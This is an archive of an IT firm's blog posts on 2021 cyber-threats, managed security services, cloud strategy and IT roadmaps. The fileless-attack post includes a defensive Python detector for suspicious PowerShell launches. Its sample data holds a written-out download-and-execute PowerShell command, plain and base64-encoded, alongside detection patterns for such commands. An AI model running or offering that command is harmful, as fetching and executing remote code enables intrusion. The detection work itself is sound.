Monthly Archives: December 2020

Five Emerging Cyber-Threats to Watch Out for in 2021

What was the driving force behind your company’s digital strategy in 2020?

Was it your CEO? Probably not. Your CTO or CISO? Perhaps. 

In reality, for most organizations, it was COVID-19. In 2019, one company after another said: “work-from-home isn’t an option for us” or “we aren’t interested in shifting operations to the cloud.” 

Then everything changed. The pandemic drove a massive shift towards remote work. For many companies, this wasn’t even an option — it was a case of ‘do or die.’ 

By April 2020, almost half of the American workforce was working from home. As organizations and employees become more comfortable with this, we shouldn’t expect a full return to the traditional in-office model anytime soon, if ever. Work-from-anywhere is the new way of doing business, with employees accessing cloud services, collaborative tools and remote systems from home and public networks – and not always through the safety of a VPN. 

This rapid shift brings a host of security challenges for companies, and we think five trends will dominate the cybersecurity landscape in 2021. 

1. Yesterday’s Cyber-Threats, Evolved 

First off, it seems clear that ‘known’ cyber-threats such as phishing, ransomware, Trojans and botnets will remain prominent. Such attacks are increasingly automated and tailored with personal info, often mined from company websites and social networks. As trends towards automation increase, these sorts of hazards will keep growing in number and frequency. 

Current events can shape these cyber-threats as well. We saw a surge in phishing emails during the pandemic, taking advantage of victims’ unfamiliarity with remote work applications or purporting to contain details of much-needed stimulus checks. 

As malware and social engineering campaigns are industrialized, cyber-criminals can assess and fine-tune their attacks based on the results achieved until they have a truly dangerous threat with a considerable success rate. 

2. Fileless Attacks 

As the name suggests, fileless attacks – a subset of ‘living off the land’ (LotL) attacks, which exploit tools and features already present in the victim’s environment – don’t rely on file-based payloads, and generally don’t generate new files either. As a result, they have the potential to fly under the radar of many prevention and detection solutions. 

A typical fileless attack might start with an emailed link to a malicious website. Social engineering tricks on that site can launch system tools, such as PowerShell, which retrieve and execute additional payloads directly in system memory. Detecting malicious use of built-in system tools, as opposed to their many legitimate automation and scripting uses, is a real challenge for traditional defenses. 

Fileless attacks aren’t new, exactly. The use of system tools as backdoors has been around for decades, but owing to the tactic’s considerable success rate – and the fact that leveraging existing system processes can shorten malware development cycles – they’re rapidly trending upwards. Also, fileless attacks aren’t limited to individual organizations: we see attackers increasingly targeting service providers, abusing their infrastructure and management tools to compromise their clients. 
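One way to tell the launch chain described above apart from routine scripting is to score process-creation telemetry on several weak signals at once. The following is an added example, not code from the original post; the event fields, parent list, weights, threshold and sample events are all assumptions constructed for illustration.

```python
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Assumption: these parents rarely need to start a script host.
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                   "chrome.exe", "msedge.exe", "firefox.exe"}
# Signs of code being fetched or run in memory rather than from a file.
IN_MEMORY_PATTERNS = {
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web-download": re.compile(
        r"downloadstring|downloaddata|invoke-webrequest|invoke-restmethod", re.I),
    "reflective-load": re.compile(r"reflection\.assembly\]?::load", re.I),
}
HIDDEN_WINDOW = re.compile(r"[-/]w\w*\s+hidden\b", re.I)
ALERT_THRESHOLD = 4  # assumed cut-off; tune against your own baseline


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_encoded_flag(token):
    """True for -EncodedCommand, any prefix of it (-e, -enc, ...) or -ec."""
    if token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or (bool(name) and "encodedcommand".startswith(name))


def decode_payload(blob):
    """-EncodedCommand is base64 over UTF-16LE text; None if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # covers bad base64 and bad UTF-16
        return None


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return 0, reasons
    score = 0
    if basename(event["parent"]) in UNUSUAL_PARENTS:
        score += 2
        reasons.append("unusual-parent")
    tokens = event["cmdline"].split()
    text = event["cmdline"]
    for i, token in enumerate(tokens[:-1]):
        if i > 0 and is_encoded_flag(token):
            score += 1
            reasons.append("encoded-command")
            # Inspect what the encoding hides, not just that it was used.
            text += "\n" + (decode_payload(tokens[i + 1]) or "")
    if HIDDEN_WINDOW.search(event["cmdline"]):
        score += 1
        reasons.append("hidden-window")
    for name, pattern in IN_MEMORY_PATTERNS.items():
        if pattern.search(text):
            score += 2
            reasons.append(name)
    return score, reasons


def triage(events):
    """Return (id, score, reasons) for events at or above the threshold."""
    results = [(e["id"],) + score_event(e) for e in events]
    return [r for r in results if r[1] >= ALERT_THRESHOLD]


# Constructed sample data; example.invalid never resolves.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "evt-1", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": PS, "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"id": "evt-2", "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": r"powershell.exe -NoProfile -File C:\Ops\rotate-logs.ps1"},
    {"id": "evt-3", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell.exe -Command Invoke-WebRequest "
                "https://example.invalid/agent.msi -OutFile agent.msi"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Only the document-spawned, hidden, encoded launch crosses the threshold; the scheduled script and the administrator's download each carry at most one signal and stay below it.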

3. Cloud and Remote Service Attacks 

The COVID-19 pandemic forced companies to quickly adopt new cloud services, remote access tools and collaboration apps. However, many organizations lacked IT experts with the relevant training to properly configure these solutions – not to mention lacking the time to properly vet available tools or the budget to work with proven vendors rather than gravitating towards free alternatives of questionable quality. 

Server applications, containers and cloud storage aren’t always well-protected, and are seen by cyber-criminals as prime targets with a large attack surface. Compromising one service may expose scores of organizations downstream – a variant of supply chain attack, which sidesteps organizational security by infiltrating higher levels in the supply network and deploying payloads through the tools you rely on and trust. Misconfiguration only raises the risk, exposing more services to attackers. Such scenarios will inevitably lead to data breaches. 

4. Business Process Compromises 

Sometimes, cyber-criminals identify vulnerabilities not in applications, but in the process flow of business operations. We’re seeing an increase in business process compromises, in which threat actors take advantage of systemic operational weaknesses for financial gain. 

Attacks on business processes demand considerable knowledge of the victims’ systems and operations. They often begin with a compromised system on the target network, through which cyber-criminals can observe the organization’s processes and gradually identify weak links. 

These attacks are often quite discreet, and impacted organizations may not detect them in a timely fashion – especially if the compromised process continues to work ‘as expected’ despite producing different results. As an example, attackers could siphon funds by compromising an automatic invoicing tool and changing the bank account number that’s populated into each future invoice.
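A control that catches the invoicing scenario above is to reconcile what the tool actually emits against a record kept outside it. The following is an added example, not code from the original post; the registry layout, account identifiers and invoice records are placeholders constructed for illustration.

```python
from datetime import date

# Constructed registry, kept outside the invoicing tool: remit-to accounts
# approved through change control, each with the date it takes effect.
APPROVED_ACCOUNTS = [
    (date(2020, 1, 1), "ACCT-A-0001"),
    (date(2020, 11, 1), "ACCT-B-0002"),  # approved bank change
]

# Constructed invoice output as it would be read back from issued documents.
SAMPLE_INVOICES = [
    {"id": "INV-1001", "issued": date(2020, 10, 28), "remit_to": "ACCT-A-0001"},
    {"id": "INV-1002", "issued": date(2020, 11, 3), "remit_to": "ACCT-B-0002"},
    {"id": "INV-1003", "issued": date(2020, 11, 20), "remit_to": "ACCT-X-9999"},
    {"id": "INV-1004", "issued": date(2020, 11, 21), "remit_to": "acct-b-0002 "},
    {"id": "INV-1005", "issued": date(2020, 11, 25), "remit_to": "ACCT-X-9999"},
    {"id": "INV-1006", "issued": date(2020, 11, 26), "remit_to": "ACCT-A-0001"},
]


def normalize(account):
    """Ignore whitespace and case so formatting changes do not raise alerts."""
    return "".join(account.split()).upper()


def approved_on(day):
    """Return the account that change control says was in force on `day`."""
    current = None
    for effective, account in sorted(APPROVED_ACCOUNTS):
        if effective <= day:
            current = account
    return current


def reconcile(invoices):
    """Compare each issued invoice with the registry.

    Returns (findings, first_seen): findings lists (invoice id, account, kind)
    where kind is "unapproved" (never in the registry) or "superseded" (an old
    approved account used after its replacement); first_seen gives the date
    each deviating account first appeared, which bounds the exposure window.
    """
    ever_approved = {account for _, account in APPROVED_ACCOUNTS}
    findings, first_seen = [], {}
    for invoice in sorted(invoices, key=lambda inv: inv["issued"]):
        seen = normalize(invoice["remit_to"])
        if seen == approved_on(invoice["issued"]):
            continue
        kind = "superseded" if seen in ever_approved else "unapproved"
        findings.append((invoice["id"], seen, kind))
        first_seen.setdefault(seen, invoice["issued"])
    return findings, first_seen


if __name__ == "__main__":
    for finding in reconcile(SAMPLE_INVOICES)[0]:
        print(finding)
```

The check reads the issued invoices rather than the tool's configuration, so it still fires when the process itself reports nothing wrong.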

5. Customized Payloads 

As we’ve seen in the contrast between phishing and spear-phishing, targeted attacks, while requiring extra effort on the threat actors’ part, are considerably more effective at compromising systems and data. This approach is starting to get much more sophisticated. 

Cyber-criminals can discover a lot about your network from company websites, social media and, of course, by compromising individual systems on the network. Pervasive, dual-use tools like PowerShell and WMI allow attackers to learn more about the tools and services your company relies on without setting off red flags. Armed with knowledge of these tools and the vulnerabilities present in each, they can construct payloads specifically designed to bring down not just a network, but your network. 

Approaches for 2021 

As cyber-criminals continue to evolve their technologies and attack strategies, organizations must adjust their approaches to cybersecurity and data protection. System-level anti-virus software isn’t enough to combat modern cyber-threats. Nor is file backup alone enough to safeguard against digital disruption by malicious actors. 

Businesses need to protect all their workloads, data and applications across multiple domains, and that requires integrated solutions that automate the system monitoring, vulnerability assessments and endpoint protection required to stop emerging threats. 

Let’s face it: 2020 has been a challenging year for cybersecurity and IT pros. Most have successfully navigated the massive changes, but unless they start preparing for the next wave of threats, 2021 may be just as rocky.

If you’d like to learn more about cyber-threats and how to protect your business in the upcoming year, contact us here at Demakis Technologies.

Cyber101: Managed SIEM vs. Managed Security Service Providers

What is the difference between Managed SIEM and Managed Security Service Provider?

A reader recently asked, “What’s the difference between a Managed SIEM Service and a Managed Security Service Provider?” It’s a question that doesn’t get asked often enough, and the differences can range from “pretty big” to “insanely different.” Let’s dive a bit deeper and see what sets these two types of services apart:

Security Information and Event Management (SIEM) systems are designed to collect and analyze security and other logs from networking devices (like firewalls) as well as servers, appliances, VMs and other infrastructure. In many cases they can also report on whatever they find. While a SIEM is an invaluable tool to have as part of your security protocols, it can be difficult to manage and requires specialized training to use effectively.

A Managed SIEM Service (MSS) is a company that does what it says on the tin. They coordinate the collection of logs into the SIEM and handle data integrity, storage, and reporting operations. However, it’s important to note that how much of each of those a particular MSS does can vary wildly. Some simply coordinate gathering the logs and manage the SIEM platform itself, reporting on the raw data but not giving insight into what it means.

Others handle storage and data management, but expect that the customer has one or more employees who will run reports and keep an eye on what’s actually going on.  Still others may do analysis, but report on all anomalies they find – including those that aren’t actual threats.  If your organization has cybersecurity personnel on the payroll, this service can be added into your overall security program, but probably isn’t sufficient to be a security program on its own. 

Managed SIEM: Centralized or Individual?

Managed SIEM Service providers may manage a centralized SIEM for multiple customers, or may set up and manage individual SIEM platforms for each customer.  Both methods are valid, so long as proper multi-tenancy restrictions are put in place so that customer data does not mix; and typically both types of solution sets can get the MSS job done. 

MSSP Solutions That Stand Out

A Managed Security Services Provider (MSSP) will do what an MSS does as part of its package of services, but most often goes beyond that by a good measure. An MSSP will analyze the data that the logs represent to look for anomalies that may or may not be threats. It will then analyze those anomalies to determine if a threat exists, and what impact that threat could have on the customer’s data and systems. An MSSP also has established methodologies to notify the customer of actual threats, and typically will also provide remediation guidance to help fix whatever security issues led to that threat event.

Added to this, the majority of MSSPs offer extended services, either as part of the base service or as add-ons purchased as bundles or à la carte. For example, MSSPs offer endpoint protection (anti-malware, Data Loss Prevention systems, etc.), email protection to stop phishing attacks and email fraud, vulnerability scanning to identify potential security issues before they become actual security issues, etc.

An MSSP Keeps You Informed on a Regular Basis

Since the MSSP handles so many of the individual security concerns of a customer, they also routinely set up regular briefings or meetings to relay new information to the customer and gather information about changes (upcoming or already in-place) to infrastructure, applications, etc.  This allows the MSSP’s services to best suit the changing reality of the IT landscape as more core applications move to Software as a Service, new technologies for networking are brought into play, etc.  

All of these services go beyond what would be expected of an MSS provider because they involve more than just the SIEM and the reports a SIEM can produce.  They require analysts to differentiate between anomalies that are benign and threats that need to be addressed.  These analysts are also trained in determining how significant a threat is in order to advise remediation over time or immediately.   

An MSSP also maintains threat intelligence services to know what threats are out there, which are seeing growth, which are the most dangerous, and which are most likely to impact its customers at any given point in time. And, of course, systems that handle vulnerability scanning, email, and endpoint protection are totally outside the scope of a SIEM and wouldn’t be expected of an MSS, but are standard offerings for an MSSP.

Conclusion

In short, an MSSP will offer MSS as part of their overall service packages, but typically an MSSP will go far beyond just managing the SIEM for a customer.  Which is the best fit for you depends on what IT and Cybersecurity talent you have on staff, if they can be used 24/7, and what hardware and/or software you have or are willing to acquire and manage from a security perspective.  You also need to know if you have the skill-set and tools to go beyond what a SIEM can offer.  If any of those points aren’t already part of your organization, then an MSSP is the way to go as they can supplement your staff, work with your IT partners, typically offer 24/7 services, and bring all the tools and skills required with them.

If you are looking for the best IT solutions for your company, feel free to contact us at Demakis Technologies.

10 Uncommon Cybersecurity Threats That Need to Be Avoided

Threats Blooming in the Cyberworld

The cyber world, or the Internet, is a vast place where the sharing of data has its pros and cons. We all know the pros, as our lives are now much easier thanks to the Internet. However, not many of us are aware of the external cyber threats that go hand in hand with sharing data.

There are certain common Cybersecurity Threats that we can avoid in order to achieve a secure and safe atmosphere for the growth of our business or any sort of activities that require shared knowledge and the transmission of data.  

Cloud Jacking 

Cloud jacking is one of the most prominent types of attack in recent times: attackers inject code to tamper with, modify or take control of sensitive information stored in the cloud. It is a very dangerous kind of data security threat.

Threats to IoT Devices

IoT, or the Internet of Things, is a rapidly growing industry, and it will grow to $1.1 trillion by 2026. Since this is a new technology, it is vulnerable to cyber threats, and not much has been developed in terms of cybersecurity in this field.

Deepfake 

A deepfake is an existing image or video that has been manipulated with the help of machine learning and artificial intelligence. It is a major threat because it can damage the image of someone influential who runs an organization, and it will unfortunately become a very common cyber threat to businesses.

Mobile Malware 

As more and more people move from laptops to mobiles and tablets, mobile malware is being developed to specifically target mobile phone operating systems. In the near future, it will be one of the external cyber threats to the cybersecurity of mobile devices.

5G-to-Wi-Fi Security Vulnerabilities 

With 5G rolling out across expansive public areas like airports, shopping centers, and hotels, the voice and data information of users on their cellular-enabled devices gets communicated via Wi-Fi access points. Mobile devices possess built-in intelligence to silently and automatically switch between cellular and Wi-Fi networks, and security researchers have already identified a number of vulnerabilities in this handover process. It is very likely that new, critical 5G-to-Wi-Fi security vulnerabilities will be exposed in 2020, which is why managing these cybersecurity threats, for example by upgrading security protocols in public Wi-Fi, is important.

Insider Cybersecurity Threats

Insider Cybersecurity Threats not only involve malicious attacks, but also the negligent use of systems and data by employees. 

To protect against these threats, organizations need to quickly and accurately detect, investigate, and respond to issues that could be indicators of insider attacks. This underlines the impact of people on cybersecurity.

Application Programming Interface (API) Vulnerabilities and Breaches 

Application programming interface (API) security readiness typically lags behind web app security across the majority of organizations today. Additionally, more than two-thirds of the organizations readily make APIs available to the public to allow external developers and partners to tap into their app ecosystems and software platforms. 

As the dependence on APIs increases, API-based breaches will become more prominent in 2020. This will trigger adverse impacts on high-profile apps in financial processes, messaging, peer-to-peer and social media. As more organizations continue to adopt APIs for their applications, API security will be exposed as the weakest link, which could lead to cloud-native threats and put user data and privacy at risk. 

Email Initiated Infections 

Email-initiated infections occur when a user clicks on an email attachment or a link in an email, either in error or thinking they’re clicking on a legitimate link or attachment. The most sophisticated attacks are nicely formatted emails that look like they’re from a legitimate source. These legitimate-looking emails contain an attractive and enticing link that either collects personal data, downloads malware or deploys a small “dropper” file that calls back to the command server for more instructions. If there is a layer of protection that stops this dropper from interacting with the server, downloading the malware, or completing the infection, the chances of the infection spreading become much more limited.

User-Initiated Website Visit 

When a user visits a website and inadvertently downloads malware, it infects their endpoint system. This may also have implications for the network to which the device is connected. Sometimes even “safe sites” can be the conduit for malware-laced links. However, a clear majority of the time, this type of cyberattack is caused by an unprotected endpoint device visiting a known unsafe site. It can also happen on known safe sites in situations such as website hijacking or URL poisoning. This is one of the most common cyber threats to a business.

DDoS

Distributed denial of service (DDoS) attacks leverage the power of hundreds or even thousands of infected computers with the intent of crashing websites or entire networks. These groups of infected computers are known as a botnet or bot network. Typically, the targets are businesses, but personal computers can be used en masse to execute a DDoS cyberattack without the innocent individual even knowing it. This is one of the most common cyber threats to a business.

Conclusion

It is clear that growing businesses must make ongoing cybersecurity training a priority for all employees while establishing a multi-layered security strategy, because everyone should have a personal goal of avoiding digital threats. Proactively keeping employees safe online and using the latest threat intelligence to stop threats before and after they have entered the company network is more important than ever, and we must keep developing modern technologies to mitigate common cyberattacks.

If you’d like to learn more about Cybersecurity threat mitigation for your business, contact us here at Demakis Technologies!

Multi-Cloud Strategies And Ways To Counter Any Issues

What are some Cloud strategy elements? 

For any business to grow, its IT systems need to work with it to protect its data and keep other digital systems safe and sound. Cloud computing is very important in IT systems today: it is on-demand, helps protect data through cloud storage, and provides computing power without direct management by the user. Today, we’re going to learn about different topics related to cloud computing like cloud strategies, hybrid cloud, cloud threats, and cloud security.

The Environment in a Cloud System  

A cloud environment is used to reduce costs because it differs from the typical equipment purchase. In the traditional model, IT equipment is always purchased ahead of time out of the organization’s capital budget, but in a cloud environment the organization only needs to pay for the service. The cost comes out of the organization’s operational budget instead, which saves money.

Magic Quadrant: Magic quadrant for cloud is a series of market research reports published by a firm called Gartner.  

Architecture in Cloud  

A multi-cloud architecture is an environment where business organizations can build a secure cloud atmosphere different from the normal cloud atmosphere.   

Multi-cloud and Cloud Strategy   

The main intent of a multi-cloud strategy is to use as many clouds as required in order to limit reliance on one cloud from a single provider.

The cloud strategies are an outline for enhancing the role of a cloud in an organization or company rather than moving everything to the cloud. Many organizations lack cloud strategies but it is projected that 70% of them will have these strategies in place by 2022.  

The key cloud strategy goals are: 

  1. To understand the availability implications 
  2. To understand the governance of your data  
  3. To understand the management impact  
  4. To understand the goals of the government  
  5. To check the number of clouds and understand them  

Digital Enterprise strategy  

Enterprise cloud strategy is a digital model where business organizations can access virtualized IT resources from any public or private cloud service provider on a pay-per-use basis. The resources can consist of networking infrastructure, data storage, or servers. The enterprise cloud strategy helps business organizations with flexibility, reducing costs, and increasing network security.  One big enterprise cloud strategy example is Netflix which took almost 6 to 7 years to transform its applications and move to microservices.  

Hybrid Cloud vs. Multi-Cloud  

An organization with a multi-cloud solution always uses multiple public cloud services from different providers. The different clouds can be used to provide the best service to the company and also include the multi-use operational approach.  

Some of you may ask, “What is a hybrid multi-cloud?” and “How is it different from multi-cloud solutions?” A hybrid multi-cloud combines both public and private clouds to obtain the best service for the organization. The components of a hybrid multi-cloud always work together, which is different from the multi-cloud model.

Machine learning 

A multi-cloud is an environment where an organization uses more than one cloud service to deliver special information. A multi-cloud can easily access intelligent capabilities without advanced skills in artificial intelligence (AI). Cloud companies like AWS and Google Cloud offer many machine learning options for multi-cloud that require neither knowledge of AI nor a team of data scientists.

The benefits of machine learning are: 

  1. The cloud pay-per-use method is very good for AI or machine workloads, as you can manage the speed and power of GPUs.  
  2. Many machine learning engines give you the opportunity to write code using Python and TensorFlow libraries.
  3. The cloud machine learning makes it easy for the organizations to work and explore machine learning as projects get piled up and the demand increases.  

Risks and threats in the cloud  

Although cloud systems provide a great deal of security and data protection, they also face multi-cloud threats that can harm the company at any time. Some of the multi-cloud threats are:

  • Workload freshness  
  • Monitoring multi-cloud  
  • Authentication  
  • Authorization 

Security patches in the cloud  

To counter risks in cloud systems, multi-cloud security should be put in place alongside them. Some multi-cloud security measures that can be taken are:

  • Your cloud environments should be under control  
  • Use software from API software developer Axway to provide security
  • Minimize reliability and redundancy  
  • Avoid vendor lock-in  

SaaS security information 

The increasing demand for software-as-a-service (SaaS) applications in business organizations has led to the development of best practices that help SaaS security protect the organization’s property.

To minimize risks the following are the SaaS security best practices:  

  • Implement SaaS security controls  
  • Keep up with the development of tech 
  • Balance risks and productivity 

Conclusion

Today we learned all about cloud systems including cloud strategies, hybrid multi-cloud, multi-cloud threats, and multi-cloud security.  

If you’d like more information on the best practices guide to Multi-Cloud, contact us here at Demakis Technologies! 

How Do The IT Roadmaps Help Plan Your Business?

Today we are going to define IT roadmaps, provide an example of an IT roadmap, and discuss a typical roadmap of a company and the roadmap builder.

IT roadmap

A roadmap is a technological strategic plan used by businesses for IT-related initiatives in the organization. There are several types of roadmaps such as:

  • Enterprise roadmap
  • IT project roadmap
  • IT architecture roadmap
  • Engineering roadmap

Benefits of IT roadmap

Some benefits of having an IT roadmap are:

It makes your IT initiatives more strategic

Organizing and planning a roadmap will help you strategically plan and identify the items needed for your business, the items that you do not need, and the items you need to prioritize.

It saves you money

Planning a roadmap will also save you money by eliminating tasks and systems that are costing the organization too much money.

It keeps the organization running smoothly

When you have a strategy, your employees will know what critical things to do to not disrupt the smooth flow of the organization.

Roadmap of a company

A business roadmap of a company is a plan of where your company is heading and how to get it there. It depicts the bigger picture for your business. It defines your company goals and objectives and illustrates the strategies for achieving growth. The roadmap of a company must therefore include its goals and objectives and the means by which to achieve them. It is typically the same as the roadmap of a business where growth is the main factor.

Roadmap builder

An IT roadmap builder is a visual summary of your goals and objectives, and how you are going to achieve them.

Making changes to your company’s technological environment can be a difficult task, but can be achieved by simply following these steps:

Identify your objectives

Before you plan your roadmap, you need to identify what you want to achieve. You should visualize your goals and then proceed to the next step. You need to know how your specific strategy will change or benefit the business.

Determine your audience

Be aware of the audience you want to create the roadmap for. This can help create the roadmap in such a way that your targeted audience understands every bit of it.

Establish major themes

After deciding upon what you want to achieve, it is time to turn those goals into plans. Start planning on the highest levels and then plan its minute details.

Share your roadmap with relevant people

When your roadmap is ready, call a meeting and share it with your stakeholders. During this time tell them about the changes to be made and how it is going to evolve the business. 

Start assigning responsibilities

Once the plan is ready to use, turn those plans into tasks.

Review the roadmap with your team and determine which projects to work on first and in which order. Assign the tasks to your team and estimate their completion time.

This is how you build an IT roadmap.

Visual roadmap

A visual roadmap is a digital or printable format of your entire plan for presentation purposes. It graphically delineates every goal and objective and how to achieve them step by step.

What is technical planning?

Technical Planning is a process that provides a framework to define the amount of technical effort required to develop, deploy, and sustain the system.

IT infrastructure services

Information technology infrastructure can be defined as a set of IT components that are the foundation of any IT services. Many companies provide such services according to your needs.

Conclusion

Today we discussed IT roadmaps, roadmap examples, and the roadmap of a company. We also discussed the benefits of a roadmap and how to create one.  Here at Demakis Technologies, we strongly recommend preparing a roadmap for your business to achieve your targets.  If you’re interested in improving the efficiency and cost-savings of your business, give us a call!